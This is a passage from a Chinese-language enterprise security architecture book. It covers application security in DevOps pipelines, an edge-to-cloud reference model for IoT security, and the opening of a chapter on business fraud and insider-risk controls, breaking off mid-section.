在数字化转型的背景下,开发运维一体化(DevOps)的敏捷模式将成为主流。敏捷模式要求构建以工具和平台为基础的自动化持续集成(CI)和持续交付(CD)。在这种敏捷开发的模式下,安全也需要构建安全工具链,实现自动化的安全测试、软件组件分析与检查、代码安全检查。 ● 工具集成化 为了确保在应用敏捷交付的同时确保安全,需要加强不同团队间的协作,实现安全措施的前置。这样的融合需要构建覆盖应用生命周期各个环节的安全工具链,并将其与应用持续集成和持续交付的流水线充分集成,促进“人人参与安全,人人为安全负责”安全文化的形成,实现安全与开发、测试、运维流程的深度融合。 17.2.5 预期成效 为了达成这个目标,需要围绕应用开发生命周期,构建应用安全能力支撑体系,优化应用开发流程,在需求确定、架构管控、编码开发、测试评估等环节添加应用开发生命周期安全控制机制。相应地,建立参考了最佳实践且覆盖了安全规范的应用安全通用需求清单;开发可导入安全基础设施防护能力的应用安全架构模板;建设可导入身份管理、特权管理等安全防护能力的开发运维一体化(DevOps)平台;制定代码安全规范,建设与应用缺陷(bug)管理平台打通的代码安全测试工具平台和软件组件分析工具平台;制定应用安全测试用例清单;设立安全应急响应中心,导入漏洞情报,开展渗透测试,建立漏洞评估和修复体系;依托身份安全、密码体系等安全工程,制备身份管理、访问控制、权限执行和密码操作等开发库;通过培训增强应用开发团队的安全意识和能力,使安全成为应用技术团队文化的一部分。 17.3 应用安全能力支撑的方法和要点 为了满足业务的需求,企业将应用系统部署在相应的计算环境中,并通过持续的监控和维护使其能够稳定地对外提供服务,从而实现对业务的支撑。因此,应用安全能力支撑的核心目标是确保企业具备持续获得安全应用系统的能力,以及通过正确的部署、运行来确保应用系统安全性的能力。 企业获取业务所需的应用系统的途径和方法是多种多样的。为了确保能够获得安全的业务系统,企业需要根据应用系统的获取途径(自主开发、购买商业软件等),在应用生命周期中各个阶段的流程卡点,使用检查列表和检查工具,确保应用安全治理措施的落地;围绕应用系统开发模式(瀑布式开发、敏捷开发),通过集成数据安全、身份安全、业务安全等安全能力组件实现应用系统“内生安全”。除此之外,为了确保企业具有持续获得安全应用系统的能力,需要通过自动化、工具化、平台化使安全内嵌于应用系统生命周期,也需要通过安全治理使安全内嵌于相关应用系统生命周期的组织、流程、文化中。 为了能够将应用系统从软件系统变成实际的业务系统,企业需要将应用系统正确、安全地部署到计算环境中,并通过持续地运维、监控、响应来确保业务系统正常运行。而随着云计算、边缘计算的发展,企业的计算环境已经发生了显著的变化,企业需要结合应用系统的架构特点、应用系统的部署方案,构建适应于应用系统架构和计算环境的业务系统安全架构。除此之外,还应该建立覆盖应用系统及计算环境的实战化安全运行能力,从而确保应用系统的安全运行。 17.3.1 构建应用安全能力 构建应用安全能力,需要充分考虑以下几个方面。 ● 应用安全治理 应用安全治理包括协助组织、管理和评估包括人员培养在内的各个层面的与应用安全相关的活动。这些活动包括:确定应用安全目标;规划和分配应用安全相关的组织、角色与职责;规划应用安全流程卡点,确定应用安全相关的预算和评估指标;针对合规要求确定安全控制措施,建立服务水平协议(SLA)等供应链管控措施以确保商业软件的安全;针对应用生命周期中涉及的架构师、开发人员、测试人员、运维人员等各类角色提供意识和专业类的安全培训,并建立相关的认证和考评机制。 ● 应用安全情报 应用安全情报涵盖了在企业层面组织、汇集应用安全的相关知识,这些知识用于指导企业内的应用安全实践。这些知识包括:攻击案例、攻击技术、攻击模式、威胁建模等与攻击者相关的知识;合规需求清单、安全需求清单、安全编码规范、应用框架和中间件规范、软件供应商应用安全义务标准等在内的覆盖应用系统生命周期各项相关工作的标准和要求;满足安全需求所需的设计模式、中间件和通用库清单、安全架构模式、安全中间件、安全指南等。 ● 应用生命周期安全 应用生命周期安全涵盖了进行应用系统安全分析、保障应用系统安全开发的各项实践,及其相关的流程、工具、文档等,包括:通过架构评审流程结合应用系统的软件架构、应用风险和威胁列表,进行应用系统安全架构分析,制定评估、修复、加固计划;通过代码审查工具结合应用系统特点,制定审查规则,针对应用系统生命周期中不同角色(例如开发人员、测试人员、安全审计人员)使用的工具制作自定义的配置文件来进行分析、跟踪并评估修复结果;把漏洞扫描、模糊性测试(fuzzing)、风险驱动的代码测试、攻击模型的应用、代码覆盖率分析等各种安全性测试与软件工程的标准质量保证(QA)流程、软件发布流程、应用上线流程进行深度融合,并将安全性测试的结果与软件缺陷进行关联和统一的管理。 ● 应用安全部署和运行 应用安全部署和运行覆盖了传统的网络安全和应用系统运维组织的各项工作,其中包括通过安全应急响应中心(SRC)面向安全社区和用户收集应用系统的漏洞、安全事件、安全威胁;定期展开渗透测试与红蓝对抗,从应用系统的外部视角和攻击者视角获取应用系统在运行阶段的安全漏洞、安全事件和安全威胁;使用安全基础设施,对应用系统及其所在的计算环境进行监控,建立应用系统安全部署的架构指南和配置指南;建立应用系统和计算环境各个层面的基线(包括静态的配置,也包括动态的指标),然后进行有效的监控,并对安全事件和异常进行及时响应和处置;在配置管理、事件管理、问题管理等关键的流程中充分考虑安全相关的因素,把安全配置、系统补丁、应用升级、应急响应等安全工作与运行维护体系(如,ITIL)进行深度融合。 17.3.2 构建应用安全能力的重点任务 企业应用安全能力的构建可以拆分为以下重点任务。 ● 任务1:建立应用部署规范和检查清单,确保应用按照安全域划分正确地部署在基础设施环境中;建立应用运行环境规范和检查清单,确保应用运行环境正确地使用网络、主机和云基础的安全防护能力,并能够对应用的输入、输出进行监控。 ● 任务2:建立覆盖漏洞情报、漏洞扫描、渗透测试、众测等在内的漏洞收集渠道,并反馈到缺陷(bug)管理平台和安全防护平台;建立漏洞评估和修复体系。 ● 任务3:建立应急响应机制,对应用漏洞、安全事件进行及时响应。 ● 任务4:提供安全意识和技能培训,确保应用开发、测试人员建立对安全的理解,从而在相关组织中建立良好的安全文化。 ● 任务5:优化应用开发流程,在需求确定、架构管控、编码开发、测试评估等环节添加软件开发生命周期(SDLC)安全控制机制。 ● 任务6:编写涵盖国家和地方法律/法规、监管要求、行业标准、内部规范的安全合规要求检查表,建立安全通用需求清单,把安全需求导入到应用;编写覆盖身份验证、访问控制、数据管控、密码使用等安全功能的应用安全架构模板,确保应用在架构中导入安全基础能力。 ● 任务7:建设涵盖静态应用代码安全测试(SAST)、动态应用代码安全测试(DAST)、交互式应用代码安全测试(ISAT)在内的应用代码安全测试(AST)平台,实现代码安全检查与应用开发测试的聚合;建设软件组件分析(SCA)平台,建立应用开发框架、中间件和通用库清单,结合漏洞情报,提高应用开发框架、中间件和通用库漏洞管理的准确性和效率。 ● 任务8:制定应用安全测试用例清单,实现安全与测试的聚合。 ● 任务9:建设融合身份管理、特权管理等安全管控措施的开发运维一体化(DevOps)平台,为应用开发团队提供支撑。 ● 任务10:建立应用开发框架、中间件和通用库的黑名单,避免应用使用不安全的应用开发框架、中间件和通用库。 ● 任务11:定义并制备身份管理、访问控制、权限执行和密码操作等开发库,通过架构模板、开发规范、测试清单等SDLC安全控制机制确保在应用中正确使用。 ● 任务12:建立安全需求规范和架构模板的演进机制,根据威胁建模、攻击面分析,结合安全威胁和安全事件数据,在架构层面审视应用安全架构,确保安全通用需求和安全架构模板的演进升级。 ● 任务13:更新供应商责任清单,明确供应商对安全漏洞和安全事件的响应义务,要求软件供应商遵循需求确定、架构管控、编码开发、测试评估等环节的SDLC安全控制机制。 第18章 物联网安全能力支撑 18.1 物联网支撑企业数字化转型带来新的威胁 物联网于1985年提出[4],至今经过35年的演进完成了从概念到技术实现的转变,走进了人们日常的生产与生活。越来越多的行业、企业通过引入物联网技术帮助降本提效,实现业务自动化、智能化。物联网发展有三个比较明显的阶段:第一阶段是通信协同阶段,即以实现M2M[5]为主要目标,机器间通过交换数据实现协同联动;第二阶段是感知使能阶段,以传感器的多元化发展为主要标志,伴随着多种新型传感技术的出现及传感器进一步的微型化,物联网极大地扩展了对现实世界的电子化、数字化感知能力;第三阶段是智能化阶段,随着芯片技术、通信技术、IT技术的持续发展,物联网从业务智能化扩展到包括接入、组网、故障切换、可靠服务、运维等方方面面的自动化、智能化,极大地降低了人工成本。 在当前物联网向第三阶段智能化过渡、技术应用爆发性增长的环境下,企业如何在引入物联网技术、建设物联网系统的同时遵循安全“三同步”原则,同步规划、同步建设一套行之有效的机制、体系来保障建成后的业务系统可以安全有序地持续运行,与引入物联网技术来支撑企业数字化转型同样重要。 18.1.1 物联网特性带来安全挑战 得益于通信技术尤其是5G的普及,其大带宽、低时延、海量连接的特性为物联网的海量接入、边缘计算提供了承载平台。为了实现海量设备实时智能响应,“边缘”成为物联网基础架构的重点建设目标。在物联网边缘区域,形形色色的海量设备承担了数据的采集、分析、处理工作,甚至包括对指令反馈的响应、动作,使得物联网边缘成为实实在在的现实世界与数字世界的转化边界,也决定了安全对于物联网来讲其意义包含功能安全(Safety)与信息安全(Security)的双重含义。物联网边缘侧的三大典型特征也是解决物联网安全时需要面对的挑战。 ● 设备类型碎片化 由于感知层设备往往需要针对业务用途进行定制化,从初级方案到系统选择都需要依据自身业务的多种需求(如业务数据采集、安防监控、运维巡检等)从多个维度进行量身定制,故而形成了感知层大量类型不一、用途不一、性能不一的设备同时存在的情况(亦即碎片化),也无法统一所有感知层设备的终端安全能力。 ● 部署泛在化 物联网依靠感知层实现对物理世界的感知、反馈,而一个企业在物理世界中的业务分布也必然不会局限在一个机房内,往往会依据业务需要分布在真实世界广泛的物理空间中。由于技术的限制,对物理世界不同的感知需求也需要不同的传感器来完成。以上两个方面决定了物联网感知层设备必然是依据企业业务的需要而形成多种类传感器共存的情况,且这些传感器需要依据业务覆盖的空间进行泛在部署。这也带来了两个问题:一是泛在化的部署使得在发生安全事件时难以依靠人员进行快速的应急响应处置;二是安全设备的部署成本与安全敏感度[6]之间存在如何平衡的问题。 ● 网络异构化 为了实现数据交互,需要考虑通信技术的选择,而物联网技术与ICT技术的发展紧密结合,导致物联网的网络架构也随之千变万化。通常需要考虑传感网数据交互频率、带宽需求、网络可靠性、网络可达性等多方面指标,来决定该采用哪种通信方式(如专线、LPWAN、3/4/5G、卫星网络等)进行通信。而感知层设备的离散部署往往又导致物联网边缘侧的接入网络通常会以多种组网方式组合构成,从而导致传统边界安全设备难以适配复杂的异构网络,无法全面、有效地对感知层网络实现安全保障。 18.1.2 物联网安全现状 在物联网发展的过程中,核心驱动力是通过新技术解决业务的自动化,加之在物联网第一阶段、第二阶段,网络安全的概念还处于发展早期,影响力有限,因此无论是设计还是应用几乎不考虑安全因素。然而,伴随着传感器、互联网、大数据、AI技术的发展,物联网在提升智能程度的同时开始承载越来越多的企业核心数据。 随着网络安全概念日益深入人心,企业逐渐开始在建设、使用物联网时考虑安全保障问题。但是,长期以来不同业务部门根据不同需要引入的大量物联网设备,几乎没有系统化管理,如在设备方面,资产是否在用、状态是否正常、是否存在漏洞等关键信息缺少维护;在网络方面,由于设备多样、责任部门不一、没有统一规划而导致物联网设备混杂接入办公网、服务网,导致拓扑不清,网络出口不清;在设备管理方面,更多依赖设备厂商提供的管理系统,这也导致因多种物联网系统同时运行而带来的的管理、运维复杂性等问题,愈发凸显了物联网设备类型碎片化、部署泛在化、网络异构化带来的安全管理难题。 18.1.3 物联网安全保障能力缺失 经过对物联网系统进行泛化、抽象并结合复杂系统的分析方法进行建模分析后,我们发现,当前绝大多数的物联网边缘安全保障能力缺失,导致当前多数物联网安全规划、建设与安全预期严重脱节,很可能建成后无法切实满足最初的安全目标,甚至在安全事件爆发时防护完全无效。 我们仍然从物联网三大特点出发进行分析: ● 物联网设备类型的碎片化决定了物联网感知层设备无法通过传统上安全的终端安全地以低成本、快速的方式对所有终端设备统一部署端上安全能力并进行管理; ● 网络异构化导致感知层边界模糊,无法通过单一类型的边界防护设备实现感知层边界安全防护; ● 物联网设备的泛在化部署引发了边界防护设备部署成本考量和如何快速有效处置应急响应的难题。 以上三方面因素相互关联,最终迫使很多项目通过降低物联网安全防护预期来保障整体项目建设的可行性。 例如,对于感知层设备,在满足业务需要的前提下,选择成本较低的直接联网方式,业务数据通过互联网再经由企业网互联网入口反向访问服务器实现业务连接,认为业务数据在传输过程中增加加密要求就等同于物联网安全。 在网络安全建设中寻找更加明确的边界进行边界安全设备的部署,例如将准入控制、防火墙、入侵检测等设备部署在汇聚层,认为只要能阻止威胁深入渗透就等同于物联网安全。 在平台层通过大数据方式建设威胁分析平台,认为通过对全域数据的分析实现威胁识别就可以保证物联网安全等。 但是,这些方式的根本问题在于没有认识到相应安全手段在物联网场景下的局限性,例如低成本开发的设备,必然导致设备自身的安全是难以统一、直接管理的,而大量同样设备的存在也使得感知层设备天生就存在批量失陷甚至沦为工具的潜在风险;边界设备的部署难以下沉,更导致了感知层内部东西向流量的无监控状态,进一步导致威胁在感知层横向移动时难以被发现,更没有有效手段进行应急处置;而海量设备的大量数据传输、处理、分析都需要一定的时间,也就导致了以大数据方式进行物联网高级威胁分析的时延通常是以小时为单位的,这也成为留给攻击者在感知层的有效窗口。 综上,物联网安全最缺乏的是在边缘侧贴近数据源的安全保障能力建设。 18.2 什么是物联网安全能力支撑 18.2.1 基本概念 物联网安全能力支撑是针对当前物联网发展阶段,结合企业对物联网建设的泛化模型,以复杂系统的分析方法进行建模、分析后进行安全架构设计而得到的一个安全参考模型。它以建设边缘安全保障能力为主要目标,能够为遵循安全三同步原则进行物联网系统建设,帮助企业认清物联网安全的难点和安全能力需求,并提供可以与企业整体安全架构紧密结合的物联网安全建设参考。 18.2.2 设计思想 物联网安全能力支撑参考模型的核心设计思想是识别物联网安全与传统网络安全的差异所在,通过安全能力的更新、再部署来补齐企业物联网环境的安全保障能力与现实需求的差距。 设计过程则是针对物联网自身特点,以EA的设计方法,结合威胁建模、SANS滑动标尺等多种工具,将安全能力进行细粒度拆解后,用构件化的方式进行能力部署规划。最终目标是实现物联网边缘设备可察、接入可信、风险可知、威胁可控,并具备一定的自学习、自进化能力,能够实现物联网系统全生命周期的安全保障。 18.2.3 参考模型 能力支撑参考模型无法脱离业务而独立存在,所以物联网安全能力支撑参考模型也抽象为端-边-云三层架构,分别为物联网终端基础安全、物联网安全接入平台和云端的物联网统一安全管理平台、物联网大数据威胁分析平台,如图18.1所示。 ● 物联网终端基础安全 在终端侧通过软件供应链安全管控体系提高物联网设备进入生产环境的安全标准,可以采用固件分析、安全测评相结合的手段,并将相关分析、测评结果导入系统安全平台以补全物联网资产-固件-漏洞关系;建立物联网设备纳管体系,统一接入物联网设备上报数据要求与身份唯一标识运算标准。 ● 物联网安全接入平台 通过对威胁感知、设备监控、资产探查、身份验证、日志采集、虚拟补丁、SDN、接入控制、配置管理、固件分发、漏洞感知能力的模块化再部署,建设更适应泛在化部署、多元接入方式的物联网安全接入平台。与密码服务平台、身份管理和访问控制平台实现接入设备的身份鉴权;打通流量、日志、审计信息至数据安全管理与风险分析平台的通道,实现数据协同,提高异常数据识别率;通过主被动结合的资产探查、SDN与接入控制实现物联网设备的可信接入;通过设备监控、威胁感知、漏洞感知、虚拟补丁、固件分发等能力实现边缘区域的脆弱性防护。 图18.1 物联网安全能力支撑参考模型 ● 物联网大数据威胁分析平台 在云端建设物联网大数据威胁分析平台,实现对全域数据的威胁分析及威胁感知模型的持续迭代,实现全生命周期的威胁感知自进化。 ● 物联网统一安全管理平台 通过建设物联网统一安全管理平台实现包括软件定义网络(SDN)在内的全域纳管设备统一策略编排,与态势感知平台协同联动提高安全运维的决策效率;与物联网使能平台打通接口,实现资产设备信息的多源数据互补,为设备管理提供更翔实的数据,最终支撑全域物联网设备全生命周期的安全管理。 18.2.4 关键技术 ● 设备唯一标识 实现感知层设备接入的身份鉴别是实现设备接入管控的基本要求,也是未来对接细粒度身份控制的基础。企业需要结合设备硬件特征,通过密码方法实现全域不可仿冒、不可篡改的唯一标识体系,并能够对所有接入设备通过唯一标识进行设备合法性验证。 ● SDN 软件定义网络技术可以解决网络异构化带来的接入安全和通信管控难题。软件定义网络通过对物理链路的软件化,在实现安全通信的基础上,通过灵活编排、智能组网来提高传输网络的可靠性。 ● 边缘计算 现阶段,物联网感知设备多数出于成本考量而算力有限,而海量设备的接入、智能化响应等需求也决定了物联网自身业务离不开边缘计算技术。在安全层面贴近数据源的边缘计算节点,利用其充足的计算能力实现安全运算是能够切实解决边缘侧威胁识别的有效技术手段。 ● 边云协同 边云协同主要是结合边缘计算节点和云计算的优势,战略性地将数据处理进行分层实现以提高数据分析效率。在物联网安全能力支撑参考模型中,边云协同还代表安全运算能力的协同,通过技术手段将云计算威胁建模后部署在边缘计算节点,并由边缘计算节点使用威胁模型对边缘侧数据进行分析,以期在威胁发生的第一时间能够精准识别。 ● 人工智能 物联网时代,海量感知设备在边缘侧接入并持续产生数据,想要在靠近数据源的边缘侧对海量多源异构的数据进行持续、智能的监控与分析,以及想在威胁发生的第一时间准确识别并自动选择合适的方式进行处置,人工智能与边缘计算的结合是可靠的技术实现路径。而两者结合的边缘智能演进方向,也是未来物联网设备爆炸性增长后能够保障边缘自治自律的必然发展方向。 ● 流量指纹 对于接入设备的识别、行为分析等都依赖于设备特征的可读性,而物联网设备由于其碎片化而导致设备网络流量的辨识度极低,加之加密流量的存在导致在实际场景中基于流量来识别仿冒/篡改设备,识别设备风险动作、感知边缘网络威胁时误报率较高。因此需要对边缘流量指纹的识别进行技术迭代,需要研制新的引擎,并结合人工智能技术提高引擎多维关联分析能力,提高识别准确率。 18.2.5 预期成效 ● 边缘设备可察 通过在安全接入平台部署接入管控、SDN、流量指纹等技术,对连接至安全接入平台的物联网设备进行主被动结合的辨识,再结合唯一标识就能够有效识别接入设备的合法性。 ● 接入可信 通过安全接入平台与身份管理访问控制平台、系统安全平台之间的联动,可对接入设备的身份、访问权限进行动态鉴权,对于风险设备、非法设备能够进行通信隔离或接入阻断。 ● 风险可知 在安全接入平台部署智能引擎,对边缘数据进行持续分析,并通过主被动结合的方式对接入设备进行脆弱性感知,将识别的威胁、脆弱性风险上报至管理平台、态势感知平台,从而做到边缘风险的动态监控。 ● 威胁可控 除了可以部署威胁分析能力外,在边缘接入平台可以适当部署边界防护能力,如防火墙、IPS等,使得与云端管理平台实现基于策略的协同联动后可以有效地实现接入阻断、通信隔离、网络防护、虚拟补丁等不同层次的边缘安全防护。 ● 全生命周期安全运营 通过在云端建设统一安全管理平台,对上报的日志、数据进行集中分析,协同大数据威胁分析平台可以支持全域物联网的持续安全运营。不断地通过海量设备的行为、日志对威胁感知模型进行训练、迭代,使得边云协同方式的威胁感知能够在数据驱动下实现持续进化,从而能够保证物联网系统全生命周期的威胁管理能力。 18.3 物联网安全能力支撑建设方法与要点 18.3.1 物联网终端基础安全 1.建设、健全软件供应链安全管控体系 物联网边缘设备的碎片化是导致物联网安全无法直接套用传统终端安全的直接原因。在设备混杂、可部署安全能力参差不齐的情况下,企业应当使用多种方式来尽量缩短感知层设备的安全能力差距,使“木桶”最短的板长更接近平均长度。 ● 企业应当联合设备供应商,在可控范围内对设备的硬件设计、制造提出适当的安全要求。如依据设备预期使用场景考虑增加专用硬件安全模组,以实现硬件级别的TEE/SE,在强保密需求环境下要求厂家对MCU、MEMS、FLASH、密码芯片等重要芯片、电路增加电磁屏蔽罩/网[7]等。 ● 对设备供应商、系统开发商的设备端系统、应用开发过程的安全保障提出要求,如建立开源组件、第三方组件的版本应用与漏洞风险信息管理机制,对软件供应链进行安全管理,并能够在发生风险时及时整改,条件具备时还应当打通供应商与用户之间的信息通道,使得在风险暴发时能够及时高效地协同用户对已上线设备进行应急响应。 ● 建立设备安全符合性测评机制并建设相关系统、平台,对供应商提供的设备进行全面测评(包含硬件和软件)以评估设备是否符合之前对供应商提出的安全设计、开发要求,系统/应用涉及的开源组件、第三方组件版本是否存在漏洞,并要求供应商整改直至符合性达标。 以上三点是通过供应链安全管控的方法让感知层设备进入业务系统的安全基础。 2.建立物联网设备安全纳管体系 如前所述,因为无法统一感知层设备的端上安全能力,也就意味着在数据层面会有所缺失,所以为了尽可能地补全数据,以支撑上层业务、应用以及安全维度的深入分析,需要能够有效补充终端侧关键信息。而想要实现物联网业务智能化的核心技术——边缘计算,也意味着需要在边缘侧进行多维度的数据运算,因而终端关键数据的补全以及异构数据的融合处理成为影响边缘侧数据分析能力的基础因素。 为了能够对海量异构数据实现合理的分层、分布式处理,利用边缘计算节点实现安全数据关联分析,提高边缘威胁感知敏感度,企业应当建立设备纳管标准及相关能力体系。对设备接入的通信协议、通信格式、通信内容进行标准化约束,要求设备接入时提供可与设备管理系统进行设备身份验证的不可篡改的唯一标识,要求设备上报业务感知数据、关键状态信息(如资源占用、进程列表、监听端口等)、与管理和安全关系密切的监控信息。如果涉及通信加密与数据加密的信息,还应当接入统一密钥管理平台以实现边云协同的数据融合处理。 18.3.2 物联网安全接入平台 面对泛在部署的海量感知层设备的接入,利用边缘计算节点将威胁感知与安全管控能力在最贴近数据源的边缘侧落地,是网络安全关口前移思想的战术落地。在面对5G和未来通信技术大带宽、低延时、海量接入的特性时,可以通过虚拟化、服务化、AI技术,在边缘侧构建物联网安全接入平台,来实现设备可信接入、边缘威胁感知、接入设备脆弱性感知、风险缓解。 ● 设备可信接入 作为感知层设备的接入节点,可以实时感知设备的接入。通过对接入设备的唯一标识、证书的验证,识别接入设备的合法性。与身份管理与访问控制平台、密码服务平台的对接更可以对设备访问动作、访问对象的接入权限实现动态管控。而结合SDN技术建立的动态网络安全通道,进一步保障了数据传输层面的可信、可靠。 ● 边缘威胁感知 物联网安全接入平台具有对感知层南北向流量和东西向流量全感知的先天优势,对于符合纳管标准,以及能够部署安全探针的物联网设备,可实现端上数据与边缘流量数据的补全。这使得智能分析引擎利用威胁感知模型能够快速、准确地实现边缘威胁感知,大大地缩短了安全分析的数据路径,提高了数据分析的时效性。 ● 接入设备脆弱性感知 通过对边缘流量的多维度关联分析,以及结合主动扫描技术,安全接入平台能够对接入的设备实现漏洞发现、配置脆弱性感知。结合感知设备终端相应信息的上报与获取,能够进一步提升安全接入平台的脆弱性感知能力和识别准确率。 ● 风险缓解 使用NFV(Network Function Virtualization,网络功能虚拟化)技术将防火墙、入侵防御等网络防护功能模块化后再进行部署,可以使物联网安全接入平台具备对边缘风险的基本响应与处置能力。由此实现风险设备的接入阻断和通信隔离,实现威胁流量的网络阻断,以及对漏洞和脆弱性利用的网络特征进行封堵,提供网络层面的虚拟补丁能力,从而提高边缘侧感知设备风险处置的灵活性。物联网安全接入平台亦可作为固件分发、配置管理的代理设备,减轻海量设备对云端服务器的访问压力,提高固件分发、补丁更新的收敛速度及收敛统计准确性。 18.3.3 物联网云端相关平台 ● 物联网统一安全管理平台 通过物联网统一安全管理平台实现与物联网管理/使能平台、系统安全平台、数据安全管理与分析平台、安全态势感知平台的横向打通,可以实现企业内部对感知层设备资产漏洞分布情况、运行状态与风险状况的掌握,实现对全域受管设备的统一策略编排、固件分发、虚拟补丁等安全管理能力,并实现与系统安全平台、安全态势感知平台、威胁情报通道的安全响应协同联动,完成架构安全、被动防御、主动防御、威胁情报等安全能力的贯通。 ● 物联网大数据威胁分析平台 为了能够在物联网系统全生命周期内持续有效地保障边缘安全,企业还需要结合大数据、态势感知、机器学习、威胁情报等新技术构建上层主动安全能力。大量感知层设备的接入会产生海量的业务、行为、流量等多维度数据,通过机器学习技术,在大数据威胁分析平台对全域数据进行持续分析、建模、训练,以实现设备指纹特征、网络行为、威胁行为识别等感知模型的持续优化。通过对部署在边缘计算节点的感知模型进行持续更新,达成边缘安全保障能力,保持与云端大数据识别能力的同步自进化,进而通过安全态势感知平台打通边缘侧行为、事件与全域安全事件态势的关联,能够进一步提升安全态势感知的时效性和态势判断能力,提高安全决策效率。 第19章 业务安全能力支撑 19.1 业务转型与业务安全新要求 19.1.1 业务线上化转型成为发展新趋势 移动互联、云计算等新兴技术的广泛应用,推动着企业向数字化转型。伴随着“互联网+”的浪潮,越来越多的企业选择开始业务转型,“业务线上化”成为当前企业发展的主流选择。 伴随着业务线上化的快速发展,制造业将渠道电商化、线上化,以拓展销售边界;政府机关通过在线供应链平台实现线上化采购;服务机构、事业单位构建在线办公平台;金融业以提高客户黏性为核心,全力打造集所有业务为一身的线上应用。除此以外,远程医疗、电子商务、移动支付、在线教育等线上化业务不断进入人们的视野,各式各样的线上业务在颠覆人们与产品互动方式的同时,也改变着人们的生活及行为习惯。 19.1.2 业务线上化发展带来新挑战 ● 外部威胁逐渐增多 企业重视自身与终端用户的便捷交互,在为用户带来更方便、更快捷、更强交互感的体验的同时,也不可避免地将自身业务风险暴露在充满威胁的开放式环境中。 随着企业间的营销竞争打破传统的实体边界,向更加开放、更加激烈的线上业务迈进,趋利本能驱动并促生了“地下黑产”的出现。地下黑产专门利用企业业务漏洞、风控不严等缺陷进行牟利,涉及范围之广,几乎横跨各行各业——从游戏业虚假登录注册到电商营销作弊,从社交媒体流量作弊到制造业商业机密外泄,从航空业恶意刷票到政府机关平台数据盗爬。其中,以银行业面临的风险场景最多,涉及申请欺诈、信息泄露、盗卡盗刷、交易欺诈、员工违规等。这些业务风险场景,若无有效风控对抗措施,将严重影响业务开展,并直接导致企业资产、声誉损失。 ● 内部威胁日趋严重 除了面对来自外部的业务风险威胁,企业内部员工违规操作带来的业务操作风险、合规风险也不容小觑。企业员工内部欺诈、内外勾结违规操作的行为具有隐蔽性强、持续性久、暴发危害大、造成损失大的特点。尤其是一些隐藏多年、累积甚多的内部风险的暴发,给企业动辄带来上千万甚至上亿元损失,这些损失不仅会直接影响企业的盈利能力,甚至会影响企业业务整体的发展存续,是企业业务推进的一大阻碍。 19.1.3 新形势下的业务安全痛点 ● 新技术的发展与融合,不断催生新的业务风险场景 随着业务不断复杂化,多风险场景、组合风险场景正逐渐成为业务风险场景新常态,这使得业务安全也面临不断升级的风险态势,风险形势更加错综复杂。 ● 应用技术复杂化不断衍生新的业务安全风险 在技术不断推陈出新的当下,不仅企业会选择运用新型技术为业务赋能,外部攻击者也在持续更新自身技术以突破企业业务安全防护;内部员工在进行违规操作时也会选择更隐蔽、更方便的新技术来隐藏自己的身份。 ● 黑产向专业化发展,产业链逐步形成 随着企业线上业务的不断开展,业务场景不断丰富,这给黑产提供的机会也越来越多。新技术的应用缩短了黑产上下游响应时间,消除了地理条件的障碍,再加上精细化分工,上下游产业职责明确,这在极大提升黑产获利效率的同时,也逐步形成了一条完整的产业链。 ● 企业内部存在不合理的操作、不可靠的人员、不完善的业务和系统 不合理的操作往往会致使业务风险事件的产生。导致不合理操作的原因主要有三方面:不可靠的人员、不完善的业务、不完善的系统。不可靠的人员是指员工违规导致内部欺诈或与外部不法分子内外勾结,针对业务漏洞进行牟利。不完善的业务主要指因业务开展时风控设计未通过业务视角去发现风险安全问题,以致业务出现风险漏洞,而被内外部欺诈者攻击、利用。不完善的系统是指业务安全系统存在系统漏洞而被内外部欺诈者攻击、利用。面对这些风险,若采取传统的风控管控模式,则不具备动态适应业务发展的能力,极易形成业务安全防控盲区,形成猝不及防、疲于应付的被动局面。 ● 业务发展与安全未能有效统一,存在割裂 首先,脱离业务谈合规,风控手段就会僵化,无法适恰业务甚至阻碍业务发展。脱离合规谈业务,业务发展没有合规的保障与约束,极易触碰监管红线,同时也会引起员工合规意识淡漠,导致内部违规事件产生。其次,企业内部数据资源利用不充分,取数难、数据孤岛现象普遍存在。数据无法充分利用,风控效果不佳;数据碎片化导致风险信息碎片化,无法获取内部的一手风险情报,不能及时探知业务风险点,业务保障功能达到瓶颈。最后,业务安全缺乏AI技术有效赋能,业务发展与风控应用技术不匹配,无法应对迅速迭代的业务带来的各类风险。 19.1.4 业务安全能力新要求 面对愈加复杂的业务安全态势,传统业务安全措施不断暴露出保障效果不佳、业务流程与风控措施割裂,甚至阻碍业务有序发展等问题。受技术、人员等多方面因素的制约,业务安全工作经常处于一种疲于应付的被动局面。 当传统的泛安全、统一化的风控安全已经不适用于当下迅速发展的业务节奏时,以业务为核心,自洽于自身业务的持续性对抗风险的业务安全能力,将成为衡量一家公司整体安全能力的关键要素。 19.2 什么是业务安全能力 19.2.1 基本概念 企业的业务安全能力,即以保障企业整体业务流程顺畅,帮助企业降低成本、提升收益,进一步增强企业竞争力为核心目标,以业务中出现或可能出现的风险为场景,基于业务流程中的内生数据,充分利用大数据分析等技术,有效防范企业业务流程中出现的各类内外部风险威胁的持续性业务风险管控、安全保障能力。 19.2.2 能力范围 从广义上划分,在业务开展过程中,针对任何威胁业务的正常开展而采取的风控、安全措施均属于业务安全能力范畴,涉及信用风险、市场风险和操作风险等多方面。狭义上,业务安全能力范围与企业自身业务形态、产品模式高度匹配,多与业务中涉及的欺诈风险、操作风险相关。例如涉及账号管理的业务会存在虚假账号风险,营销活动会遇到营销作弊问题,支付交易业务会存在盗用资金的风险,信用贷款业务会存在违约欺诈风险,基于实名身份开展的业务会存在身份冒用问题,业务人员违规操作会带来操作风险等。 19.2.3 总体架构 业务安全能力体系的构建,以业务流程内生数据为基础,围绕四方面打造企业对抗业务风险的专项能力,即客户信息保护能力、反作弊能力、反欺诈能力及内容识别能力,覆盖业务不同环节,有效管控业务安全风险,如图19.1所示。 图19.1 企业级业务安全能力体系架构图 19.2.4 核心技术 ● 异常行为分析 通过关联用户活动和相关实体信息来构建人物角色与群组,定义个体与群组的正常行为,然后与不同异常行为个体、群体进行多维度的相互比对分析,将异常行为个体检测出来,从而能够检测出业务欺诈、敏感数据泄露,并能发现内部违规员工、找到有针对性的攻击等。 ● 业务全局风险视图 通过业务全局风险视图,针对性地定制风险指标,精准展示各部门业务人员风险轮廓与特征,重点解决决策层面临的风险信息分散、不充分、结构化不高等问题,有效过滤冗杂信息垃圾,帮助决策人员及时掌握业务全流程风险态势,对业务安全风险做到及时预警、及时知晓、及时响应。 ● 智能化模型分析 将专家规则“取其精华,去其糟粕”,利用大数据、机器学习技术将模型智能化,这不仅有效满足各类业务需求,而且也能支持后续工作进行智能化的持续迭代。 19.2.5 关键要素 ● 充分利用企业内部数据资产 